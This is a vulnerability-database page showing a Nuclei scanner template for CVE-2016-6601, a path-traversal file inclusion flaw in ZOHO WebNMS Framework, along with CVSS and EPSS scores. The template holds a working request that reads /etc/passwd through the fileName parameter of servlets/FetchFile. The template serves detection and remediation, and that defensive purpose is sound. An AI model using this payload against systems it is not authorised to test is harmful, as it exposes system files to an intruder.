Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-6601
HistoryAug 21, 2022 - 12:25 a.m.

ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion

2022-08-2100:25:37
ProjectDiscovery
github.com
24
zoho
webnms
file inclusion
vulnerability
unauthorized access

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8 High

AI Score

Confidence

High

0.975 High

EPSS

Percentile

100.0%

ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a … (dot dot) in the fileName parameter to servlets/FetchFile.

id: CVE-2016-6601

info:
  name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or complete compromise of the affected system.
  remediation: |
    Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability.
  reference:
    - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
    - https://www.exploit-db.com/exploits/40229/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
    - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_cred_disclosure
    - http://www.rapid7.com/db/modules/auxiliary/admin/http/webnms_file_download
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-6601
    cwe-id: CWE-22
    epss-score: 0.97504
    epss-percentile: 0.99983
    cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zohocorp
    product: webnms_framework
  tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp

http:
  - method: GET
    path:
      - "{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f4a1e8dd56ed0a8a6a8cc9692b37edef8295462b12b7782b3d8f2fd6e36bdf6e022100b9383b27f28dad89a9fc7bd50b400de9f676c75677f6ff6598c66b338ac76b43:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

8 High

AI Score

Confidence

High

0.975 High

EPSS

Percentile

100.0%